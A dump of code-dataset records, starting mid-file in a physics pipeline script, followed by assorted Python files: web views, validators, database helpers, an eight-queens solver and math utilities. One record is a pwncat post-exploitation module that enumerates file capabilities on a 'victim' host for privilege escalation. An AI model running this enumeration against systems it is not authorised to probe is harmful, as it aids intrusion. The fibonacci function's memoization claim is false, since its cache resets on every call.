string. Try to convert to int (e.g. if `'1'` is passed to indicate the\n # second stage), and -- if successful -- use this as `args.only_stage`.\n # Otherwise, the string value passed will be used (e.g. 
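The `-v` option above uses argparse's `count` action, so each repeat bumps an integer; mapping that count onto log levels is then a small clamped lookup. A sketch with the standard logging module, which unlike PISA has no trace level:

```python
import logging
from argparse import ArgumentParser

parser = ArgumentParser()
parser.add_argument("-v", action="count", default=0)
args = parser.parse_args(["-vv"])

# 0 -> WARNING, 1 -> INFO, 2+ -> DEBUG (a common convention, assumed here).
level = [logging.WARNING, logging.INFO, logging.DEBUG][min(args.v, 2)]
logging.basicConfig(level=level)
```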
`'osc'` could be\n # passed).\n try:\n only_stage_int = int(args.only_stage)\n except (ValueError, TypeError):\n pass\n else:\n args.only_stage = only_stage_int\n\n if args.outdir:\n mkdir(args.outdir)\n else:\n if args.pdf or args.png:\n raise ValueError(\"No --outdir provided, so cannot save images.\")\n\n # Most basic parsing of the pipeline config (parsing only to this level\n # allows for simple strings to be specified as args for updating)\n bcp = PISAConfigParser()\n bcp.read(args.pipeline)\n\n # Update the config with any args specified on command line\n if args.arg is not None:\n for arg_list in args.arg:\n if len(arg_list) < 2:\n raise ValueError(\n 'Args must be formatted as: \"section arg=val\". Got \"%s\"'\n \" instead.\" % \" \".join(arg_list)\n )\n section = arg_list[0]\n remainder = \" \".join(arg_list[1:])\n eq_split = remainder.split(\"=\")\n newarg = eq_split[0].strip()\n value = (\"=\".join(eq_split[1:])).strip()\n logging.debug(\n 'Setting config section \"%s\" arg \"%s\" = \"%s\"', section, newarg, value\n )\n try:\n bcp.set(section, newarg, value)\n except NoSectionError:\n logging.error(\n 'Invalid section \"%s\" specified. Must be one of %s',\n section,\n bcp.sections(),\n )\n raise\n\n # Instantiate the pipeline\n pipeline = Pipeline(bcp) # pylint: disable=redefined-outer-name\n\n if args.select is not None:\n pipeline.select_params(args.select, error_on_missing=True)\n\n if args.only_stage is None:\n stop_idx = args.stop_after_stage\n try:\n stop_idx = int(stop_idx)\n except (TypeError, ValueError):\n pass\n if isinstance(stop_idx, str):\n stop_idx = pipeline.index(stop_idx)\n outputs = pipeline.get_outputs(\n idx=stop_idx\n ) # pylint: disable=redefined-outer-name\n if stop_idx is not None:\n stop_idx += 1\n indices = slice(0, stop_idx)\n else:\n assert args.stop_after_stage is None\n idx = pipeline.index(args.only_stage)\n stage = pipeline[idx]\n indices = slice(idx, idx + 1)\n\n # Create dummy inputs if necessary\n inputs = None\n if hasattr(stage, \"input_binning\"):\n logging.warning(\n \"Stage requires input, so building dummy\"\n \" inputs of random numbers, with random state set to the input\"\n \" index according to alphabetical ordering of input names and\"\n \" filled in alphabetical ordering of dimension names.\"\n )\n input_maps = []\n tmp = deepcopy(stage.input_binning)\n alphabetical_binning = tmp.reorder_dimensions(sorted(tmp.names))\n for input_num, input_name in enumerate(sorted(stage.input_names)):\n # Create a new map with all 3's; name according to the input\n hist = np.full(shape=alphabetical_binning.shape, fill_value=3.0)\n input_map = Map(\n name=input_name, binning=alphabetical_binning, hist=hist\n )\n\n # Apply Poisson fluctuations to randomize the values in the map\n input_map.fluctuate(method=\"poisson\", random_state=input_num)\n\n # Reorder dimensions according to user's original binning spec\n input_map.reorder_dimensions(stage.input_binning)\n input_maps.append(input_map)\n inputs = MapSet(maps=input_maps, name=\"ones\", hash=1)\n\n outputs = stage.run(inputs=inputs)\n\n for stage in pipeline[indices]:\n if not args.outdir:\n break\n stg_svc = stage.stage_name + \"__\" + stage.service_name\n fbase = os.path.join(args.outdir, stg_svc)\n if args.intermediate or stage == pipeline[indices][-1]:\n stage.outputs.to_json(fbase + \"__output.json.bz2\")\n if args.transforms and stage.use_transforms:\n stage.transforms.to_json(fbase + \"__transforms.json.bz2\")\n\n # also only plot if args intermediate or last stage\n if args.intermediate or 
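The `--arg` override loop above joins everything after the section name and splits on the first `=`, so values may themselves contain `=`; the same split in isolation, with `str.partition` replacing the manual `eq_split` bookkeeping:

```python
def parse_override(arg_list):
    # arg_list comes from argparse as e.g. ["stage:flux", "path=/tmp/x=y"]
    section = arg_list[0]
    name, _, value = " ".join(arg_list[1:]).partition("=")
    return section, name.strip(), value.strip()

assert parse_override(["stage:flux", "path=/tmp/x=y"]) == (
    "stage:flux", "path", "/tmp/x=y")
```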
stage == pipeline[indices][-1]:\n formats = OrderedDict(png=args.png, pdf=args.pdf)\n if isinstance(stage.outputs, Data):\n # TODO(shivesh): plots made here will use the most recent\n # \"pisa_weight\" column and so all stages will have identical plots\n # (one workaround is to turn on \"memcache_deepcopy\")\n # TODO(shivesh): intermediate stages have no output binning\n if stage.output_binning is None:\n logging.debug(\"Skipping plot of intermediate stage %s\", stage)\n continue\n outputs = stage.outputs.histogram_set(\n binning=stage.output_binning,\n nu_weights_col=\"pisa_weight\",\n mu_weights_col=\"pisa_weight\",\n noise_weights_col=\"pisa_weight\",\n mapset_name=stg_svc,\n errors=True,\n )\n elif isinstance(stage.outputs, (MapSet, TransformSet)):\n outputs = stage.outputs\n\n try:\n for fmt, enabled in formats.items():\n if not enabled:\n continue\n my_plotter = Plotter(\n stamp=\"Event rate\",\n outdir=args.outdir,\n fmt=fmt,\n log=False,\n annotate=args.annotate,\n )\n my_plotter.ratio = True\n my_plotter.plot_2d_array(\n outputs, fname=stg_svc + \"__output\", cmap=\"RdBu\"\n )\n except ValueError as exc:\n logging.error(\n \"Failed to save plot to format %s. See exception\" \" message below\",\n fmt,\n )\n traceback.format_exc()\n logging.exception(exc)\n logging.warning(\"I can't go on, I'll go on.\")\n\n if return_outputs:\n return pipeline, outputs\n\n\nif __name__ == \"__main__\":\n pipeline, outputs = main(return_outputs=True) # pylint: disable=invalid-name\n","sub_path":"pisa/core/pipeline.py","file_name":"pipeline.py","file_ext":"py","file_size_in_byte":29978,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"95589715","text":"#!/usr/bin/env python3\nimport dataclasses\nfrom typing import Generator, List\n\nfrom colorama import Fore\n\nimport pwncat\nfrom pwncat.enumerate import FactData\n\nname = \"pwncat.enumerate.capabilities\"\nprovides = \"file.caps\"\nper_user = True\nalways_run = False\n\n\n@dataclasses.dataclass\nclass FileCapabilityData(FactData):\n\n path: str\n \"\"\" The path to the file \"\"\"\n caps: List[str]\n \"\"\" List of strings representing the capabilities (e.g. 
\"cap_net_raw+ep\") \"\"\"\n\n def __str__(self):\n line = f\"[cyan]{self.path}[/cyan] -> [[\"\n line += \",\".join(f\"[blue]{c}[/blue]\" for c in self.caps)\n line += \"]]\"\n return line\n\n\ndef enumerate() -> Generator[FactData, None, None]:\n \"\"\"\n Enumerate executables with assigned capabilities\n\n :return: generator of FileCapability data\n \"\"\"\n\n if pwncat.victim.which(\"getcap\") is None:\n return\n\n with pwncat.victim.subprocess(f\"getcap -r / 2>/dev/null\", \"r\") as filp:\n for line in filp:\n line = line.strip().decode(\"utf-8\")\n # I don't know why this would happen, but just in case\n if \" = \" not in line:\n continue\n\n filename, caps = [x.strip() for x in line.split(\" = \")]\n caps = caps.split(\",\")\n\n yield FileCapabilityData(filename, caps)\n","sub_path":"pwncat/enumerate/capabilities.py","file_name":"capabilities.py","file_ext":"py","file_size_in_byte":1312,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"246642900","text":"import re\n\nfrom django.conf import settings\nfrom django.core.exceptions import ValidationError\nfrom django.utils.translation import ugettext as _\n\nfrom Chat.utils.error_messages import POSITIVE_INTEGER_MESSAGE, MAX_COUNT_MESSAGE, MESSAGES_TYPES_MESSAGE, \\\n EMPTY_TEXT_MESSAGE, TEXT_PARAM_MESSAGE\n\nVALID_COUNT_REGEX = r'^[1-9]\\d*$'\nVALID_MESSAGES_TYPES = ['read', 'unread']\n\n\ndef validate_count(count):\n if count is not None:\n if not re.search(VALID_COUNT_REGEX, count):\n raise ValidationError(_(POSITIVE_INTEGER_MESSAGE))\n max_count = settings.CHAT_CONFIGURATION['max_messages_count']\n if int(count) > int(max_count):\n raise ValidationError(_(MAX_COUNT_MESSAGE.format(max_count)))\n\n\ndef validate_messages_type(messages_type):\n if messages_type not in VALID_MESSAGES_TYPES:\n raise ValidationError(_(MESSAGES_TYPES_MESSAGE))\n\n\ndef validate_message_text(text):\n if not text:\n raise ValidationError(_(EMPTY_TEXT_MESSAGE))\n\n\ndef validate_request_data(data):\n if data is None or 'text' not in data.keys():\n raise ValidationError(_(TEXT_PARAM_MESSAGE))\n","sub_path":"Chat/utils/validators.py","file_name":"validators.py","file_ext":"py","file_size_in_byte":1125,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"246766327","text":"import sqlite3, os\nfrom sqlite3 import Error\n\nclass DatabaseSetup():\n\tdef __init__(self):\n\t\tself.conn = sqlite3.connect(self.create_database())\n\t\tself.cursor = self.conn.cursor()\n\n\n\tdef create_database(self):\n\t\ttry:\n\t\t\tfile = 'wmconfig.db'\n\t\t\tdir = '/var/lib/wmconfig'\n\t\t\tif not os.path.exists(dir):\n\t\t\t\tos.makedirs(dir)\n\t\t\tfile = dir + '/' + file\n\n\t\t\tconn = sqlite3.connect(file)\n\t\texcept Error as e:\n\t\t\tprint(e)\n\t\tfinally:\n\t\t\tif conn:\n\t\t\t\tconn.close()\n\t\treturn file\n\n\n\tdef create_tables(self):\n\t\tdef drop_table(name):\n\t\t\ttry:\n\t\t\t\tstatement = \"DROP TABLE IF EXISTS {};\".format(name)\n\t\t\t\tself.cursor.execute(statement)\n\t\t\t\tself.conn.commit()\n\t\t\texcept Error as e:\n\t\t\t\tprint(e)\n\n\n\t\tdef create_file_table():\n\t\t\ttry:\n\t\t\t\tdrop_table('FILES')\n\t\t\t\tstatement = '''CREATE TABLE IF NOT EXISTS FILES (\n \t PATH TEXT PRIMARY KEY NOT NULL,\n\t\t\t\t\t\tCONTENT BLOB NOT NULL\n \t);\n\t\t\t\t\t'''\n\t\t\t\tself.cursor.execute(statement)\n\t\t\t\tself.conn.commit()\n\t\t\texcept Error as 
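The pwncat enumerator above splits each `getcap -r /` line on ` = ` into a path and a comma-separated capability list; that parsing step alone:

```python
def parse_getcap_line(line):
    # Lines look like: "/usr/bin/ping = cap_net_raw+ep"
    if " = " not in line:
        return None
    path, caps = (part.strip() for part in line.split(" = ", 1))
    return path, caps.split(",")

assert parse_getcap_line("/usr/bin/ping = cap_net_raw+ep") == (
    "/usr/bin/ping", ["cap_net_raw+ep"])
```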
e:\n\t\t\t\tprint(e)\n\n\t\tcreate_file_table()\n","sub_path":"backend/database.py","file_name":"database.py","file_ext":"py","file_size_in_byte":1054,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"32123806","text":"import zipfly\n\n# Efficient way to read a single very large binary file in python\n\nfile_location = '/home/user/Documents/file-100-GB.csv'\n\ngo_to_streaming = zipfly.from_one_file( file_location )\n\nprint ( go_to_streaming )\n# ","sub_path":"examples/one_file_response.py","file_name":"one_file_response.py","file_ext":"py","file_size_in_byte":273,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"214998605","text":"from django import template\nfrom course_requests.models import CourseTaken, CourseGiven\nregister = template.Library()\n\n@register.filter\ndef request_notifications(i):\n taken_ones = CourseTaken.objects.all().count()\n given_ones = CourseGiven.objects.all().count()\n notification = taken_ones + given_ones\n return notification","sub_path":"course_requests/templatetags/request_notifications.py","file_name":"request_notifications.py","file_ext":"py","file_size_in_byte":334,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"495501679","text":"import sys\nimport re\n\n\nclass Configuration:\n\n def __init__(self):\n self.server_name = \"Aache\"\n self.server_version = 1.0\n self.config_folder = \"/home/alexis/.papache/\"\n self.config = {}\n self.mime = {}\n self.read_config_file()\n self.read_mime_file()\n\n def read_mime_file(self):\n url = \"{}mime.conf\".format(self.config_folder)\n try:\n file = open(url, \"r\")\n lines = file.readlines()\n for line in lines:\n ext, mime = self.parse_mime_line(line)\n self.mime[ext] = mime\n except FileNotFoundError:\n sys.stderr(\"/!\\\\ Mime file not found\")\n quit(-1)\n\n def read_config_file(self):\n url = \"{}papache.conf\".format(self.config_folder)\n try:\n file = open(url, \"r\")\n lines = file.readlines()\n for line in lines:\n config_name, result = self.parse_config_line(line)\n self.config[config_name] = result\n except FileNotFoundError:\n sys.stderr(\"/!\\\\ Configuration file not found\")\n quit(-1)\n\n @staticmethod\n def parse_config_line(line):\n matched = re.search(\"^(.+)(?=\\s=\\s)\", line)\n config_name = matched.group(0)\n matched = re.search(\"(\\\"([^\\\"]|\\\"\\\")*\\\")\", line)\n result = matched.group(0)\n result = result.replace(\"\\\"\", \"\")\n return config_name, result\n\n @staticmethod\n def parse_mime_line(line):\n matched = re.search(\"\\t(.+)$\", line)\n mime = matched.group(0)\n mime = mime.replace(\"\\t\",\"\")\n matched = re.search(\"^(.+)\\t\", line)\n extension = matched.group(0)\n extension = extension.replace(\"\\t\", \"\")\n return extension, mime\n\n def get(self, config):\n s = self.config.get(config)\n return s\n\n def get_mime(self, extension):\n s = self.mime.get(extension)\n if s is None:\n s = \"application/octet-stream\"\n return s\n\n @staticmethod\n def file_is_text(mime):\n if mime is None:\n b = False\n elif \"text\" in mime:\n b = True\n else:\n b = False\n return b\n\n def get_error_html(self, code):\n try:\n file = open(\"{}{}.html\".format(self.config_folder, code), \"r\")\n result = file.read()\n except FileNotFoundError:\n result = \"

<html><head><title>Error - System File Not Found</title></head><body>
    \" \\\n \"There is a problem with needed files. Just relax, your error code is {}\".format(code)\n return result\n\n def get_server_name(self):\n return self.server_name\n\n def get_server_version(self):\n return self.server_version\n","sub_path":"config_file.py","file_name":"config_file.py","file_ext":"py","file_size_in_byte":2729,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"207736561","text":"import json\nimport joblib\nimport numpy as np\n\nwith open(\"/model/files/outlier_detector.joblib\", \"rb\") as fp:\n od_model = joblib.load(fp)\n\nwith open(\"/model/files/fields_config.json\", \"r\") as fp:\n config = json.load(fp)\n\nFIELDS = config['field_names']\n\ndef predict(**kwargs):\n x = np.array([kwargs.get(field_name) for field_name in FIELDS], dtype=float)\n score = od_model.predict_proba(x.reshape(1, -1), method='unify')[:, 1]\n return {\"value\": score.item()}\n","sub_path":"hydro_auto_od/resources/monitoring_model_template/src/func_main.py","file_name":"func_main.py","file_ext":"py","file_size_in_byte":472,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"348947299","text":"import app\nimport flask\n\npage = flask.Blueprint('root', __name__)\n\n@page.route('/')\ndef index():\n key = \"conferences.lang.\" + flask.g.lang\n\n conferences = app.cache.get(key)\n if not conferences:\n conferences = app.api.list_conference(lang=flask.g.lang)\n if conferences is None:\n return app.api.last_error(), 500\n app.cache.set(key, conferences, 600)\n\n return flask.render_template('index.tpl',\n pagetitle='top',\n conferences=conferences\n )\n\n# Note: this has to come BEFORE other handlers\n@page.route('/favicon.ico')\ndef favicon():\n flask.abort(404)\n\n@page.route('/beacon')\ndef beacon():\n return flask.render_template('beacon.tpl')\n\n\n","sub_path":"blueprints/root.py","file_name":"root.py","file_ext":"py","file_size_in_byte":700,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"120353224","text":"from oaipmh.client import Client\nfrom oaipmh.metadata import MetadataRegistry, oai_dc_reader\n\nBASE_URL = 'http://eprints.upnjatim.ac.id/cgi/oai2'\n\nDC_FIELDS_NAMES = [\n 'title',\n 'creator',\n 'subject',\n 'description',\n 'publisher',\n 'contributor',\n 'date',\n 'type',\n 'format',\n 'identifier',\n 'source',\n 'language',\n 'relation',\n 'coverage',\n 'rights'\n]\n\nregistry = MetadataRegistry()\nregistry.registerReader('oai_dc', oai_dc_reader)\nclient = Client(BASE_URL, registry)\n\nrecord = client.getRecord(metadataPrefix='oai_dc', identifier='oai:generic.eprints.org:14')\nmetadata = record[1]\n\nfor field_name in DC_FIELDS_NAMES:\n print(f'{field_name[0].upper()}{field_name[1:]}:')\n for field_value in metadata.getField(field_name):\n print(f' - {field_value}')\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":809,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"27915435","text":"def check(arr, dp):\r\n\tfor x in range(0, dp, 1):\r\n\t\tif (p[x] == p[dp]) or (p[x]+(dp-x)==p[dp]) or (p[x]-(dp-x)==p[dp]):\r\n\t\t\treturn -1\r\n\treturn 1\r\n\r\ndef stepnext(arr, dp):\r\n\tif arr[dp] == 8 and (dp == 1) and (arr[0]==8):\r\n\t\treturn -1\r\n\tfor x in range (dp+1, 8, 1):\r\n\t\tp[x] = 1\r\n\tp[dp] = p[dp] + 1\r\n\tfor x in range (dp, -1, -1):\r\n\t\tif p[x] == 9:\r\n\t\t\tp[x] = 1\r\n\t\t\tp[x-1] = p[x-1] + 1\r\n\t\telse:\r\n\t\t\treturn 
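The Flask index view above is a textbook cache-aside lookup keyed by language; the pattern in isolation, with `cache` and `fetch` standing in for `app.cache` and `app.api.list_conference`:

```python
def cached_conferences(cache, fetch, lang, ttl=600):
    key = "conferences.lang." + lang
    value = cache.get(key)
    if not value:
        value = fetch(lang=lang)
        if value is not None:
            # Only cache successful lookups, as the view above does.
            cache.set(key, value, ttl)
    return value
```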
x\r\n\r\ndef xprint(arr):\r\n\tfor x in range(0, 8, 1):\r\n\t\tk = [0, 0, 0, 0, 0, 0, 0, 0]\r\n\t\tk[arr[x]-1] = 1\r\n\t\tprint (k)\r\n\tprint (\"\\n\")\r\n\r\nprint (\"start!!!!\")\r\n# the main starts from here\r\np = [1, 1, 1, 1, 1, 1, 1, 1]\r\nsolution = 0\r\ndeep = 0\r\n\t\r\n#main loop\r\nwhile True:\r\n\t#print (p)\r\n\tif 1 == check(p, deep): #can put it!\r\n\t\tif deep == 7:\r\n\t\t\t#print (\"good! we found a solution\")\r\n\t\t\txprint (p)\r\n\t\t\tsolution = solution + 1\r\n\t\t\tdeep = stepnext(p, deep)\r\n\t\t\tif deep == -1:\r\n\t\t\t\tbreak\r\n\t\telse:\r\n\t\t\tdeep = deep + 1\r\n\telse:\r\n\t\tdeep = stepnext(p, deep)\r\n\t\tif deep == -1:\r\n\t\t\tbreak\r\n\r\nprint(\"solution = \", solution)\r\n","sub_path":"algorithm_practice/8queen/test1.py","file_name":"test1.py","file_ext":"py","file_size_in_byte":1002,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"330686727","text":"import vk_api\nfrom tqdm import tqdm\n\n\ndef fetch_all_upcoming_events(vk_session, country_id, city_id):\n vk = vk_session.get_api()\n return vk.groups.search(q=' ', type='event', country_id=country_id, city_id=city_id, future=True, count=1000)['items']\n\n\ndef fetch_events_members(vk_session, events, verbose=False):\n vk = vk_session.get_api()\n tools = vk_api.VkTools(vk)\n\n members = dict()\n\n if verbose:\n events = tqdm(events)\n for event in events:\n event_members = tools.get_all('groups.getMembers', max_count=1000,\n values=dict(group_id=event['id']))['items']\n unsure_event_members = tools.get_all('groups.getMembers', max_count=1000,\n values=dict(group_id=event['id'], filter='unsure'))['items']\n\n members[event['id']] = dict()\n members[event['id']]['sure'] = event_members\n members[event['id']]['unsure'] = unsure_event_members\n\n return members\n\n\ndef fetch_events_walls(vk_session, events, verbose=False):\n vk = vk_session.get_api()\n\n texts = dict()\n\n if verbose:\n events = tqdm(events)\n for event in events:\n try:\n wall = vk.wall.get(owner_id=-int(event['id']), filter='owner', count=100)['items']\n texts[event['id']] = []\n for post in wall:\n texts[event['id']].append(post.get('text', ''))\n texts[event['id']].append(post.get('copy_history', [{}])[0].get('text', ''))\n except:\n pass\n\n return texts\n\n","sub_path":"recomendations/fetchers/events.py","file_name":"events.py","file_ext":"py","file_size_in_byte":1558,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"550480042","text":"# -*-coding:utf8 -*-\n\n# 有个目录,里面是你自己写过的程序,统计一下你写过多少行代码。包括空行和注释,但是要分别列出来\n\nimport glob\n\ndef analyze_program(file_name):\n\tline_count = 0\n\tcomment_flag = False\n\tspace_line_count = 0\n\tcomment_line_count = 0\n\twith open(filename, 'rb') as file:\n\t\tfor line in file:\n\t\t\tline_count += 1\n\t\t\tif not line.strip(): space_line_count += 1\n\t\t\telif line.startswith(b'#'): comment_line_count += 1\n\t\t\telif line.startswith(b\"'''\") or line.startswith(b'\"\"\"'):\n\t\t\t\tcomment_flag = not comment_flag\n\t\t\t\tif comment_flag: comment_line_count += 1\n\t\tprint('file %s has %d lines:'%(filename,line_count))\n\t\tprint('%d space lines'%space_line_count)\n\t\tprint('%d comment_lines\\n'%comment_line_count)\n\nif __name__ == '__main__':\n\tfor filename in glob.glob(\"*.py\"):\n\t\tanalyze_program(filename)","sub_path":"0007/0007.py","file_name":"0007.py","file_ext":"py","file_size_in_byte":848,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} 
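The line counter in 0007.py above only counts the opening delimiter of a triple-quoted block, so the body of a block comment is never classified; a variant that attributes every line inside the block to comments (still a heuristic, not a tokenizer, and UTF-8 text mode is assumed instead of the original's binary reads):

```python
def count_lines(path):
    total = blank = comment = 0
    in_block = False
    with open(path, encoding="utf-8") as fh:
        for line in fh:
            total += 1
            stripped = line.strip()
            if in_block:
                comment += 1
                if stripped.endswith(('"""', "'''")):
                    in_block = False
            elif not stripped:
                blank += 1
            elif stripped.startswith("#"):
                comment += 1
            elif stripped.startswith(('"""', "'''")):
                comment += 1
                # A one-line docstring opens and closes on the same line.
                if not (len(stripped) > 3 and stripped.endswith(('"""', "'''"))):
                    in_block = True
    return total, blank, comment
```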
+{"seq_id":"189479800","text":"from ssixa.base.database.basedb import SSIXADBBase\nfrom ssixa.base.database.oidcdbobject import OIDCUser, OIDCAttribute\n\nfrom oic.utils.userinfo import UserInfo\n\nimport logging\nlog = logging.getLogger(__name__)\n\n\nclass UserInfoDB(UserInfo, SSIXADBBase):\n\n def __init__(self, db, instance=None):\n UserInfo.__init__(self)\n SSIXADBBase.__init__(self, db)\n self.instance = instance\n\n def __call__(self, userid, client_id, user_info_claims=None, **kwargs):\n try:\n return self.filter(self[userid], user_info_claims)\n except KeyError:\n return {}\n\n def add_claims(self, uid, claims, client=None):\n log.debug(\"Uid: \" + str(uid))\n log.debug(\"Claims: \" + str(claims))\n assert isinstance(claims, dict)\n s = None\n\n try:\n s = self.get_session()\n users = s.query(OIDCUser).filter(OIDCUser.username == uid).all()\n if users is not None and len(users) == 1:\n for c in claims:\n found = False\n for oidc_a in users[0].attributes:\n if c == oidc_a.attribute:\n oidc_a.value = c\n found = True\n if not found:\n users[0].attributes.append(OIDCAttribute(c,claims[c]))\n s.add(users[0])\n else:\n u = OIDCUser.fromDict(uid, claims, instance=self.instance)\n s.add(u)\n s.commit()\n except Exception as e:\n log.exception(\"Database commit failed\")\n finally:\n if s is not None:\n s.close()\n\n if client is not None:\n self.add_client_id_to_uid(uid, client)\n\n def remove_claims(self, uid, claims):\n log.debug(\"Uid: \" + str(uid))\n log.debug(\"Claims: \" + str(claims))\n assert isinstance(claims, dict)\n s = None\n\n try:\n s = self.get_session()\n users = s.query(OIDCUser).filter(OIDCUser.username == uid).all()\n if users is not None and len(users) == 1:\n for c in claims:\n users[0].attributes.remove(OIDCAttribute(c, claims[c]))\n s.add(users[0])\n s.commit()\n except Exception as e:\n log.exception(\"Database commit failed\")\n finally:\n if s is not None:\n s.close()\n\n def uid_for_client_id_exist(self, userid, client_id):\n log.debug(\"User Id: \" + str(userid))\n log.debug(\"Client Id: \" + str(client_id))\n assert userid is not None\n assert client_id is not None\n\n s = None\n count = 0\n try:\n s = self.get_session()\n users = s.query(OIDCUser).filter(OIDCUser.username == userid).all()\n if users is not None and len(users) > 0:\n for cid in users[0].client_id.split(','):\n if cid == client_id:\n count = count + 1\n except Exception as e:\n log.exception(\"Database query failed\")\n finally:\n if s is not None:\n s.close()\n\n if count > 0:\n log.debug(\"Result True\")\n return True\n else:\n log.debug(\"Result False\")\n return False\n\n def add_client_id_to_uid(self, uid, client_id):\n log.debug(\"Uid: \" + str(uid))\n log.debug(\"Client Id: \" + str(client_id))\n s = None\n\n try:\n s = self.get_session()\n users = s.query(OIDCUser).filter(OIDCUser.username == uid).all()\n if users is not None and len(users) == 1:\n cid = users[0].client_id\n if (cid is None) or (client_id not in cid.split(',')):\n if cid is None:\n cid = client_id\n else:\n cid = cid + \",\" + client_id\n users[0].client_id = cid\n s.add(users[0])\n s.commit()\n except Exception as e:\n log.exception(\"Database commit failed\")\n finally:\n if s is not None:\n s.close()\n\n def remove_client_id_from_uid(self, uid, client_id):\n log.debug(\"Uid: \" + str(uid))\n log.debug(\"Client Id: \" + str(client_id))\n s = None\n\n try:\n s = self.get_session()\n users = s.query(OIDCUser).filter(OIDCUser.username == uid).all()\n if users is not None and len(users) == 1:\n cid = 
users[0].client_id\n if cid is not None:\n if (client_id + ',') in cid:\n cid = cid.replace(client_id + ',','')\n else:\n cid = cid.replace(client_id, '')\n users[0].client_id = cid\n s.add(users[0])\n s.commit()\n except Exception as e:\n log.exception(\"Database commit failed\")\n finally:\n if s is not None:\n s.close()\n\n def cleanup(self):\n log.debug(\"Database cleanup\")\n s = None\n try:\n s = self.get_session()\n users = s.query(OIDCUser).filter(OIDCUser.instance == self.instance).all()\n for u in users:\n for a in u.attributes:\n s.delete(a)\n s.delete(u)\n s.commit()\n except Exception as e:\n log.exception(\"Database commit failed\")\n finally:\n if s is not None:\n s.close()\n\n def __getitem__(self, key):\n log.debug(\"Key: \" + str(key))\n s = None\n users = None\n item = None\n\n try:\n s = self.get_session()\n users = s.query(OIDCUser).filter(OIDCUser.username == key).all()\n if users is not None and len(users) == 1:\n item = users[0].toDict()\n else:\n log.error(\"User not found.\")\n except Exception as e:\n log.exception(\"Database query failed\")\n finally:\n if s is not None:\n s.close()\n\n log.debug(item)\n return item\n\n def __setitem__(self, key, value):\n log.debug(\"Key: \" + str(key))\n log.debug(\"Value: \" + str(value))\n assert key is not None\n assert isinstance(value, dict)\n\n # Set key with value and check if item already exists\n s = None\n try:\n s = self.get_session()\n ex_user = s.query(OIDCUser).filter(OIDCUser.username == key).all()\n if len(ex_user) > 0:\n user = ex_user[0]\n user.attributes = OIDCAttribute.fromDictToListofOIDCAttributes(value)\n else:\n user = OIDCUser.fromDict(key, value, instance=self.instance)\n s.add(user)\n s.commit()\n except Exception as e:\n log.exception(\"Database commit failed\")\n finally:\n if s is not None:\n s.close()\n\n def __delitem__(self, key):\n log.debug(\"Key: \" + str(key))\n # Remove key from database.\n assert key is not None\n\n s = None\n try:\n s = self.get_session()\n users = s.query(OIDCUser).filter(OIDCUser.username == key).all()\n if len(users) == 1:\n s.delete(users[0])\n s.commit()\n except Exception as e:\n log.exception(\"Database commit failed\")\n finally:\n if s is not None:\n s.close()\n\n def __contains__(self, key):\n log.debug(\"Key: \" + str(key))\n # Return True if key is contained in the database.\n assert key is not None\n\n s = None\n count=0\n try:\n s = self.get_session()\n users = s.query(OIDCUser).filter(OIDCUser.username == key).all()\n count = len(users)\n except Exception as e:\n log.exception(\"Database query failed\")\n finally:\n if s is not None:\n s.close()\n\n if count > 0:\n log.debug(\"Result True\")\n return True\n else:\n log.debug(\"Result False\")\n return False","sub_path":"ssixa/base/database/userinfodb.py","file_name":"userinfodb.py","file_ext":"py","file_size_in_byte":8272,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"473502183","text":"\"\"\"\nThis is a function for a recursive sum of an array. 
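Every method of `UserInfoDB` above repeats the same open-session/query/commit/close scaffolding with a broad `except`; a `contextmanager` collapses that boilerplate. A sketch against the `get_session` accessor shown above, re-raising instead of swallowing the exception:

```python
import logging
from contextlib import contextmanager

log = logging.getLogger(__name__)

@contextmanager
def session_scope(db):
    # Open a session, commit on success, log and re-raise on failure,
    # always close.
    session = db.get_session()
    try:
        yield session
        session.commit()
    except Exception:
        log.exception("Database commit failed")
        raise
    finally:
        session.close()

# usage inside a method:
#   with session_scope(self) as s:
#       users = s.query(OIDCUser).filter(OIDCUser.username == uid).all()
```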
\n\"\"\"\ndef _findSum(arr, N): \n if len(arr)== 1: \n return arr[0] \n else: \n return arr[0]+_findSum(arr[1:], N) \n\ndef fibonacci(n):\n \"\"\"\n This is a fibonacci function The function has been optimised with the use of memoization.\n\n Calculate nth term in fibonacci sequence\n \n Args:\n n (int): nth term in fibonacci sequence to calculate\n \n Returns:\n int: nth term of fibonacci sequence,\n equal to sum of previous two terms\n \n Examples:\n >>> fibonacci(1)\n 1 \n >> fibonacci(2)\n 1\n >> fibonacci(3)\n 2\n \"\"\"\n #The cache is where reults will be stored in memory so that as the sequence gets longer and more complex it doesn't slow down\n fibonacci_cache = {}\n\n\n #this is to optimize the sequence to run faster as the sequence gets longer\n if n in fibonacci_cache:\n return fibonacci_cache[n]\n \n #The fibonacci sequence and how it works through the numbers\n if n == 1:\n value = 1\n elif n == 2:\n value = 1\n elif n > 2:\n value = fibonacci(n-1) + fibonacci(n-2)\n '''Return nth term in fibonacci sequence\n from cache if the value is in a really high number'''\n fibonacci_cache[n] = value\n return value\n\n\n\ndef factorial(n):\n \"\"\"\n check if number greater than 1 as there is no real test case for - or zero factorial\n we use while so that the code runs hopefully quicker but there is no real advantage in this\n unless you have something else running but this function we don't so it's just nice to have\n \"\"\"\n while n >= 1:\n #we return what the multiplication of the number that is our 